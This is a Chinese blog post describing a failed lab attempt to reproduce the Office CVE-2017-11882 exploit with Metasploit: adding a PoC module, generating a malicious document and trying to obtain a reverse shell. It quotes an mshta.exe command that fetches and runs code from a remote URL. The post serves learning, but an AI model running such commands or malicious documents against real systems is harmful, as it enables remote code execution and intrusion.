Office CVE-2017-11882复现

继续练习metasploit的使用,这次复现的是11882这个漏洞,但是最后并没有成功(已经把我逼疯)。这里记录两个复现方式,希望有缘人能够为小女子解答最后不成功的原因,小女子感激不尽。


就不去介绍这个漏洞了,网上搜一大把的。下面直接放两个方式的截图以及简单讲解。
00X0利用网上的poc来复现
poc地址:https://www.cnblogs.com/i-honey/p/7885573.html
首先要把cve-2017-11882.rb文件复制到msf模块下
Office CVE-2017-11882复现
然后打开README.md,按照提示进行恶意doc的生成,其中有一个是用来弹计算器的。我们直接生成恶意doc,注意这里的地址要换成你自己主机的地址。
Office CVE-2017-11882复现
然后我们来使用我们添加的msf模块,设置参数,这里如果search不到新添加的模块可以使用:reload_all命令
Office CVE-2017-11882复现
Office CVE-2017-11882复现
然后运行,这里也显示失败的结果了。如果成功反弹shell输入sessions的时候会出现一个或者多个session。
Office CVE-2017-11882复现
失败的原因我想和下面这个错误有关。当我在本地cmd下运行【mshta.exe "http://192.168.40.22:8080/abc " 的时候也是出现系统找不到指定文件的错误。
Office CVE-2017-11882复现
00X01利用Metasploit自带exp
search模块,然后set参数,如图,当我在主机打开恶意doc时,直接出来下图内容,之前在网上看到一哥们说这是表示本机office没有漏洞,但是我利用弹计算器的测试doc能够成功弹出doc,说明本地office版本应该还是有漏洞的吧。
Office CVE-2017-11882复现
朋友说是我主机windows系统的原因,他在他本地也不能反弹,但是他在他windows虚拟机里面就可以。我也是母鸡了~

转载于:https://blog.51cto.com/13539934/2103188

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值